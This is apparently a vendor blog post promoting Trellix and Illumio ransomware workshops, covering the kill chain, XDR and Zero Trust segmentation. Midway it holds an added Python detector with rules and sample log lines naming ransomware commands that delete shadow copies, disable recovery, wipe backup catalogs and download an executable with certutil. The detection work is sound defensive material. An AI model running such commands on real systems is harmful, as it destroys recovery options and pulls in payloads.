

Trellix and Illumio Team Up with Advice on How to Defeat Ransomware

Ransomware has been the most prevalent form of cyberattack every year for the last decade. And it shows no sign of abating. Cyber criminals are coming up with new ways to monetize their attacks and employing more complex and sophisticated tactics.

Looking ahead to 2024, the Trellix Advanced Research Center predicts that more ransomware groups will contact the clients of their victims as a new way to apply pressure and increase their earnings.

What can you do to strengthen your security posture and protect your organization? Trellix is partnering with Illumio on a series of Ransomware Detection and Response Workshops this December in the United States. Here are some key pointers from the workshops with insights from Illumio Chief Evangelist John Kindervag, widely known as the creator of Zero Trust.

Understand the anatomy of a ransomware attack and the ransomware kill chain

Ransomware attacks are sophisticated multi-stage operations that take place over time. The Trellix Advanced Research Center analyzed more than 9,000 real-world attacks to develop a seven-stage kill chain model specific to ransomware.

During an early stage of the kill chain, such as Reconnaissance, an attacker may be scanning your environment for exposed services, gathering information about your users and systems, and phishing for credentials. An XDR platform with a threat intelligence foundation helps organizations detect attacks at these earliest stages, before the attacker has a foothold.

Ransomware grows more dangerous after initial access, as attackers move laterally through the network and hunt for valuable data to exfiltrate to infrastructure they control before encryption begins. Shutting down lateral movement and command and control is essential to reducing the impact of an attack. Yet many organizations struggle to connect the dots across multiple siloed tools and to prioritize real threats amid alert “noise” during these phases – another reason XDR is so essential.

Says Kindervag, “The most important thing that organizations need to understand is that they’re allowing command and control from the ransomware attacker to come into their network and access the data or asset that is being hit with a ransomware attack.”

Prepare by assessing your gaps and locating your crown jewels

Preparation is critical to combating ransomware. According to Trellix CISO Harold Rivas, “Regular security control assessments are crucial tools for identifying weak spots in systems.”

Your preparation should include simulated attacks and vulnerability scans. Ransomware isn’t like other cyber incidents, so it’s important to drill for it. Taking part in tabletop exercises, engaging professional services for vulnerability assessments, and staying abreast of new threat actors and tactics can all help you prepare.

It’s especially important before an attack to understand the critical data assets you’re protecting.

Says Kindervag, “Understand what data or assets you have that are really important and critical to your business function (data that you would be forced to pay a ransom on if it was held hostage because your operations couldn’t continue without it). That is precisely the data that attackers will target. There are two types of data in the world: there’s data that people want to steal and everything else. You protect the data that people want to steal. And if you don’t understand what that is, then you’re a juicy target for attackers.”

Gain visibility with XDR

Visibility is key to effective ransomware defense. The earlier in the ransomware kill chain that you can detect and respond to an attack, the better off you will be. By integrating multiple data sources and providing intelligent correlation across security controls and threat intelligence, XDR helps you detect and respond to an attack much earlier in the ransomware lifecycle.

“XDR provides telemetry for visibility that can be vital to early detection and mitigation of ransomware attacks,” says Kindervag.

The Trellix XDR Platform minimizes time to detection and resolution from days and weeks to hours and minutes.

Evolve your maturity

Ransomware detection and response maturity is a journey. Many organizations at early stages of their maturity have endpoint protection. Endpoint protection is foundational, but it’s not enough. Ransomware threat actors increasingly abuse legitimate, often signed, system tools to evade detection – the so-called LOLBins (“living off the land” binaries and scripts). Because the binaries themselves are benign, traditional signature-based endpoint protection struggles to flag them; what gives the attacker away is how the tool is used, which calls for behavioral detection on the command line and process context.
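To make the LOLBin point concrete, here is an added example (not Trellix or Illumio code, and not a reproduction of any workshop material) that scans process-creation events for command-line patterns commonly seen when ransomware inhibits recovery or stages tooling. The rule set, the ATT&CK technique mappings, the JSON-lines log format and the log lines themselves are assumptions constructed for this illustration; a real deployment would use the telemetry of the EDR or XDR platform in use.

```python
"""Added example: behavioral detection of living-off-the-land (LOLBin) abuse
typical of ransomware pre-encryption activity, run over constructed
process-creation events. Not vendor code; rules and mappings are assumptions."""
import json
import re
from collections import defaultdict

# Hypothetical rule set. Each entry: rule name, regex over the command line,
# and the MITRE ATT&CK technique it is assumed to map to. Every binary here is
# a legitimate Windows tool, which is why the binary alone is not an indicator;
# the arguments are.
LOLBIN_RULES = [
    ("shadow_copy_deletion",   r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b",       "T1490"),
    ("shadow_copy_deletion",   r"\bwmic(\.exe)?\b.*\bshadowcopy\s+delete\b",        "T1490"),
    ("recovery_disabled",      r"\bbcdedit(\.exe)?\b.*\brecoveryenabled\s+no\b",    "T1490"),
    ("backup_catalog_deleted", r"\bwbadmin(\.exe)?\b.*\bdelete\s+catalog\b",        "T1490"),
    ("certutil_download",      r"\bcertutil(\.exe)?\b.*-urlcache\b",               "T1105"),
    ("remote_process_create",  r"\bwmic(\.exe)?\b.*\bprocess\s+call\s+create\b",   "T1047"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE), tid) for name, pat, tid in LOLBIN_RULES]

# Constructed process-creation events (JSON lines). Not real telemetry.
# Note the last line: "vssadmin list shadows" is ordinary admin activity and
# must not fire, which is why the rules key on the destructive verbs.
SAMPLE_LOG = """\
{"ts": "2023-12-01T09:12:04Z", "host": "FS01", "user": "jdoe", "parent": "explorer.exe", "cmd": "notepad.exe notes.txt"}
{"ts": "2023-12-01T09:14:55Z", "host": "FS01", "user": "svc_backup", "parent": "cmd.exe", "cmd": "vssadmin.exe Delete Shadows /All /Quiet"}
{"ts": "2023-12-01T09:14:57Z", "host": "FS01", "user": "svc_backup", "parent": "cmd.exe", "cmd": "bcdedit.exe /set {default} recoveryenabled No"}
{"ts": "2023-12-01T09:15:02Z", "host": "FS01", "user": "svc_backup", "parent": "cmd.exe", "cmd": "wbadmin delete catalog -quiet"}
{"ts": "2023-12-01T09:20:31Z", "host": "WS17", "user": "asmith", "parent": "powershell.exe", "cmd": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.exe"}
{"ts": "2023-12-01T09:21:10Z", "host": "WS22", "user": "itadmin", "parent": "cmd.exe", "cmd": "vssadmin list shadows"}
"""


def scan_events(log_text):
    """Return one finding dict per (event, rule) match."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        for name, rx, tid in COMPILED:
            if rx.search(ev["cmd"]):
                findings.append({
                    "ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                    "parent": ev["parent"], "rule": name, "technique": tid,
                    "cmd": ev["cmd"],
                })
    return findings


def hosts_with_recovery_inhibition(findings, min_distinct_rules=2):
    """Escalate hosts where several distinct recovery-inhibition (T1490)
    behaviors fire. A single shadow-copy deletion can be a backup job;
    deletion plus disabling Windows recovery plus wiping the backup catalog,
    within minutes on one host, is the classic pre-encryption sequence."""
    rules_by_host = defaultdict(set)
    for f in findings:
        if f["technique"] == "T1490":
            rules_by_host[f["host"]].add(f["rule"])
    return sorted(h for h, rules in rules_by_host.items() if len(rules) >= min_distinct_rules)


if __name__ == "__main__":
    hits = scan_events(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["host"]:5} {h["technique"]} {h["rule"]:24} {h["cmd"]}')
    print("hosts likely staging for encryption:", hosts_with_recovery_inhibition(hits))
```

The two-stage design mirrors the point in the text: individual rule hits are noisy (an administrator listing or even deleting old shadow copies is legitimate), so the escalation step correlates distinct behaviors per host rather than alerting on every match. In the sample, only FS01 is escalated; WS17's certutil download is surfaced as a finding for triage, and WS22's read-only vssadmin command is ignored.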

As you evolve from foundational ransomware resilience, layer additional security controls and link them through integrations. In the Trellix Ransomware Detection and Response Workshops we cover increasing stages of ransomware resilience. Mature organizations may integrate EDR, XDR, NDR, and other sophisticated technologies.

Explains Kindervag, “Much of cybersecurity is about creating friction so that the attacker will move off to a softer target. It’s often said that ‘attackers don’t attack well-defended networks,’ and since attackers have a Return on Investment (ROI) that they must meet, they’re not going to spend much time in a Zero Trust environment that’s properly segmented. That’s because they recognize it’s fairly futile to get to the assets they want to steal or disrupt in order to monetize their business model. In short, microsegmentation makes it harder for bad actors to realize a tangible ROI on their attacks.”

Implement a Zero Trust Strategy

Zero Trust principles of “Never trust, always verify” arose from Kindervag’s time as VP and Principal Analyst at Forrester Research. At Illumio, a Zero Trust Segmentation approach makes it difficult for cyber criminals to carry out their attacks.

Kindervag explains, “In Zero Trust, our primary control is a segmentation gateway that segments the data or asset into its own Protect Surface (essentially, the smallest possible reduction of the attack surface to the data, applications, assets, and services that you need to protect). So, having visibility is number 1. You’re trying to get visibility so that you can see the ransomware attack starting to happen and stop it from being successful. Having proper telemetry becomes really important as well. And then a way to operationalize that quickly, like with Zero Trust Segmentation, so you can shut down the attack before it can do significant damage to the business.”

You can learn more about how Trellix and Illumio help you defend against ransomware at an upcoming Ransomware Detection and Response Workshop in Tampa on Dec. 5, Atlanta on Dec. 7, or Houston on Dec. 12.
